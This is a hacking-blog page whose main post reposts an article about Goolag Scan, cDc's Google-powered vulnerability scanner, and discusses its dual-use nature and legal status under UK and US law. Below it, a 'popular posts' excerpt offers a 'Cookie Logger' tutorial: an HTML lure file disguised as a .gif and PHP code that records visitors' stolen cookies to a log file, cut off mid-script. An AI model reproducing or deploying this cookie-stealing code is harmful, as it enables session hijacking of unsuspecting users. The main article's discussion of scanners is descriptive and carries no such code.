Skip to main content

Google as a Vulnerability Scanner

Google as a Vulnerability Scanner
----------------------------------


Todays Post Gonna Be something Different,we know Nowadays There are Many or we Can say various types Scanners Available but herez new Try out!!
DO COMMENT!!

Goolag Scan scours the Web for compromised systems and confidential information. But is it legal?

Google, as everyone knows, excels at helping users find information scattered across the Web. Leveraging this fact, a hacker group known as cDc, or Cult of the Dead Cow, has created a tool that uses Google to automatically scour the Web for compromised systems and confidential information.

A vulnerability scanner is a powerful tool that can be used for both good and evil purposes. The software, which searches and maps applications, computers and networks for existing weaknesses, can be used by an individual or business to spot and fix security holes — or by an attacker to find easy targets. Using Google, and its immense power to drive searches for attack friendly resources, can potentially create the ultimate vulnerability scanner.

Enter Goolag Scan
-----------------------
Goolag Scan, cDc's Google-powered vulnerability scanner, uses selected search queries to uncover links to exposed Web applications, backdoors and documents that contain potentially useful information for attackers. Although skilled hackers have long been able to find such material with their own custom-search techniques, Goolag Scan promises to give the same power to far less knowledgeable individuals, conceivably expanding the ranks of attackers significantly.

Cybersecurity experts have therefore become interested in Goolag Scan. The new software raises the frightening prospect of an automated attacker spider that capitalizes on even the slightest security lapses, pouncing on any trace of system weakness. Such a program could be an extremely powerful tool in the hands of anyone who intends to hijack a digital resource for personal or financial gain.

Letter of the Law
--------------------
Moral issues aside, many security experts are unsure that Goolag Scan is legal. While attacking a computer system with the intent to create damage is illicit almost everywhere, the law is far less clear about whether one can use Google to uncover publicly exposed vulnerability information.

Mike Barwise noted in an article for the Heise Security Web site that, under British law, as long as a content owner planned for the information to be publicly accessible, there is no legal risk in following a link and viewing content. "But if the owner of the material exposed it to public access in error, intending it to be private, it could be a whole different kettle of fish," he wrote.

Barwise observed that the U.K.'s Computer Misuse Act of 1990, as amended by the Police and Justice Act of 2006, bars unauthorized access to any type of computer material. Several U.S. laws also prohibit unauthorized access. Yet for authorities to successfully convict a hacker, they have to prove that the individual intended to gain access to private material. Since Goolag Scan is an automated and powerful vulnerability scanner, it would be difficult to affirm that the user knew any of the information it supplied was unauthorized. On the other hand, authorities may be able to prove that search queries driving the scan were crafted to find private information.

Since Goolag Scan is a new tool, no cases have yet been brought against anyone using it in an alleged crime, either in the U.K. or the U.S. If or when this happens, a court will decide whether employing this software is illegal. Until then, Goolag Scan users — particularly those with malicious intent — should realize that they are using the vulnerability scanner at their own risk.


Courtsey:-Unhappy Ghost 

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Assembly Language Step-by-step: Programming with DOS and Linux-

(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary